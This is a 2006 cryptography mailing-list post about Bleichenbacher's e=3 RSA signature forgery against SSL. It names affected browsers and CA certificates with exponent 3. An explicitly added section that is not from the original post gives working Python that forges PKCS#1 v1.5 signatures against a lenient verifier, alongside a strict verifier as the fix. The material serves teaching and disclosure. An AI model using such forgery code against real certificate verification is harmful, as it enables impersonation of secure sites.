[43501] in cryptography@c2.net mail archive


Re: Real World Exploit for Bleichenbachers Attack on SSL from

daemon@ATHENA.MIT.EDU (Erik Tews)
Fri Sep 15 18:59:02 2006

X-Original-To: cryptography@metzdowd.com
From: Erik Tews <e_tews@cdc.informatik.tu-darmstadt.de>
To: Cryptography <cryptography@metzdowd.com>
In-Reply-To: <1158273608.4171.108.camel@localhost.localdomain>
Date: Fri, 15 Sep 2006 19:29:39 +0200



On Friday, 15.09.2006, 00:40 +0200, Erik Tews wrote:
> I have to check some legal aspects before publishing the names of the
> browser which accepted this certificate and the name of the
> ca-certificates with exponent 3 I used in some hours, if nobody tells me
> not to do that. Depending on the advice I get, I will release the
> sourcecode of the exploit too.

OK, so here are the names of the browsers I tried:

      * Mozilla Firefox version 1.5.0.6 and all previous versions,
        including all old versions like Netscape 4, seem to be affected.
        They don't display any kind of warning message at all, nor does
        the user have the possibility to see anything if he looks at the
        SSL connection properties. Firefox 1.5.0.7 was released yesterday
        and contains a fix. Netscape is no longer supported, and
        Netscape phoned me and suggested switching to another browser
        like SeaMonkey.
      * Opera 9.01 is affected. Opera is going to release 9.02 very, very
        soon, which will contain a bugfix. Opera users are automatically
        notified once a week when a new version is available.
      * Konqueror from the KDE project uses OpenSSL for SSL connections.
        It is affected, but after patching OpenSSL, Konqueror is fixed
        too.

The following certs could be used in the attack:

Starfieldtech has issued the following certificate:

Issuer: L=ValiCert Validation Network, O=ValiCert, Inc., OU=ValiCert Class 2 Policy Validation Authority, CN=http://www.valicert.com//emailAddress=info@valicert.com
Subject: C=US, ST=Arizona, L=Scottsdale, O=Starfield Technologies, Inc., OU=http://www.starfieldtech.com/repository, CN=Starfield Secure Certification Authority/emailAddress=practices@starfieldtech.com
X509v3 Basic Constraints: CA:TRUE
Serial Number: 260 (0x104)
RSA Public Key: (1024 bit)
Exponent: 3 (0x3)

This can be used to create a CA certificate which seems to be signed by Starfieldtech.

There is another certificate by default in a lot of browsers:

Issuer: C=US, O=Entrust.net, OU=www.entrust.net/CPS incorp. by ref. (limits liab.), OU=(c) 1999 Entrust.net Limited, CN=Entrust.net Secure Server Certification Authority
Subject: C=US, O=Entrust.net, OU=www.entrust.net/CPS incorp. by ref. (limits liab.), OU=(c) 1999 Entrust.net Limited, CN=Entrust.net Secure Server Certification Authority
RSA Public Key: (1024 bit)
Exponent: 3 (0x3)
X509v3 Basic Constraints: CA:TRUE
Serial Number: 927650371 (0x374ad243)

This one can be used too.

Depending on the browser you use, there are some other certificates.
Here is a list of the Subject DNs of all CA certs we have found so far
which seem to be affected:

      * C=US, O=Digital Signature Trust Co., OU=DSTCA E1
      * C=US, O=Digital Signature Trust Co., OU=DSTCA E2
      * C=US, O=Entrust.net, OU=www.entrust.net/Client_CA_Info/CPS
        incorp. by ref. limits liab., OU=(c) 1999 Entrust.net Limited,
        CN=Entrust.net Client Certification Authority
      * C=US, O=Entrust.net, OU=www.entrust.net/CPS incorp. by ref.
        (limits liab.), OU=(c) 1999 Entrust.net Limited, CN=Entrust.net
        Secure Server Certification Authority
      * C=EU, O=AC Camerfirma SA CIF A82743287,
        OU=http://www.chambersign.org, CN=Chambers of Commerce Root
      * C=EU, O=AC Camerfirma SA CIF A82743287,
        OU=http://www.chambersign.org, CN=Global Chambersign Root
      * C=US, O=The Go Daddy Group, Inc., OU=Go Daddy Class 2
        Certification Authority
      * C=US, O=Starfield Technologies, Inc., OU=Starfield Class 2
        Certification Authority

I decided to keep the actual implementation of the exploit secret for the moment.

We put up a little webpage summarizing some postings related to the
attack. It is written primarily for end users who want to secure their
browsers, but contains links to some interesting mailing list posts too.

http://www.cdc.informatik.tu-darmstadt.de/securebrowser/


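The mechanism behind the attack this thread is about, as an added example that is not Erik Tews' exploit and not code from any of the browsers or CAs named above: a PKCS#1 v1.5 verifier that parses the padded block from the front (00 01 FF..FF 00 DigestInfo Hash) and ignores whatever follows the hash will accept any number s whose cube begins with that prefix, and with public exponent 3 such an s is just a cube root that never wraps modulo n. The example generates its own 2048-bit e=3 key (hypothetical, not any CA's key), signs a constructed message, forges a second signature from the public modulus alone, and checks both against the lenient verifier and against a fixed one that rebuilds the whole expected block and compares all of it. Note that with a 1024-bit key the region the lenient verifier ignores (656 bits) is smaller than the spacing between consecutive cubes of that size (roughly 2^674), so this plain trailing-garbage variant does not fit the 1024-bit CA certificates listed in the post; forging under those keys needs more freedom than this example gives the attacker, and the post's own exploit is not reproduced here.

```python
"""Bleichenbacher e=3 PKCS#1 v1.5 forgery against a lenient verifier (added example).
The 2048-bit e=3 key is generated locally and is hypothetical, as is the message.
The attack itself uses only the public modulus n; SHA-1 DigestInfo prefix per PKCS#1.
"""
import hashlib
import random

SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")  # DER DigestInfo prefix for SHA-1

def icbrt(x):
    """Floor of the integer cube root of x (binary search, exact for big ints)."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        lo, hi = (mid, hi) if mid ** 3 <= x else (lo, mid - 1)
    return lo

def is_probable_prime(n, rounds=16):
    """Miller-Rabin after a small trial-division filter."""
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_e3_key(bits=2048):
    """RSA key with e=3: both primes are 2 mod 3 so that 3 is invertible mod phi(n)."""
    primes = []
    while len(primes) < 2:
        c = random.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
        if c % 3 == 2 and c not in primes and is_probable_prime(c):
            primes.append(c)
    p, q = primes
    return p * q, 3, pow(3, -1, (p - 1) * (q - 1))

def emsa_pkcs1_v15(msg, k):
    """EMSA-PKCS1-v1_5 with SHA-1: 00 01 FF..FF 00 DigestInfo||Hash, exactly k bytes."""
    t = SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - 3 - len(t)) + b"\x00" + t

def sign(n, d, msg):
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(emsa_pkcs1_v15(msg, k), "big"), d, n)

def verify_lenient(n, e, sig, msg):
    """Vulnerable verifier: walks the padding from the front and never looks past the hash."""
    k = (n.bit_length() + 7) // 8
    em = pow(sig, e, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < k and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= k or em[i] != 0x00:
        return False
    t = SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    return em[i + 1:i + 1 + len(t)] == t  # bug: em[i + 1 + len(t):] is ignored

def verify_strict(n, e, sig, msg):
    """Fixed verifier: rebuild the whole expected block and require an exact match."""
    k = (n.bit_length() + 7) // 8
    return pow(sig, e, n).to_bytes(k, "big") == emsa_pkcs1_v15(msg, k)

def forge_e3(n, msg):
    """Forge a signature for msg using only the public modulus; needs e == 3."""
    k = (n.bit_length() + 7) // 8
    head = b"\x00\x01" + b"\xff" * 8 + b"\x00" + SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    free_bits = 8 * (k - len(head))          # bytes the lenient verifier ignores
    low = int.from_bytes(head, "big") << free_bits
    s = icbrt(low)
    if s ** 3 < low:
        s += 1                               # smallest s with s^3 >= low
    # s^3 must land inside the ignored region (cube spacing near s is about 3*s^2)
    if s ** 3 >= low + (1 << free_bits) or s ** 3 >= n:
        raise ValueError("modulus too small for the trailing-garbage variant")
    return s

def demo():
    """Legitimate signature passes both verifiers; the forgery passes only the lenient one."""
    random.seed(2006)                        # reproducible hypothetical CA key
    n, e, d = gen_e3_key(2048)
    msg = b"constructed to-be-signed certificate body"
    real, fake = sign(n, d, msg), forge_e3(n, msg)
    return {"real_lenient": verify_lenient(n, e, real, msg), "real_strict": verify_strict(n, e, real, msg),
            "fake_lenient": verify_lenient(n, e, fake, msg), "fake_strict": verify_strict(n, e, fake, msg)}

if __name__ == "__main__":
    print(demo())  # {'real_lenient': True, 'real_strict': True, 'fake_lenient': True, 'fake_strict': False}
```

The forgery costs one integer cube root; the defence is not a bigger key but a verifier that reconstructs the entire encoded block and compares it in full, which is what verify_strict does. Calling forge_e3 with a 1024-bit modulus raises, because the residual s^3 - low almost always overflows the 656 ignored bits.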

---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
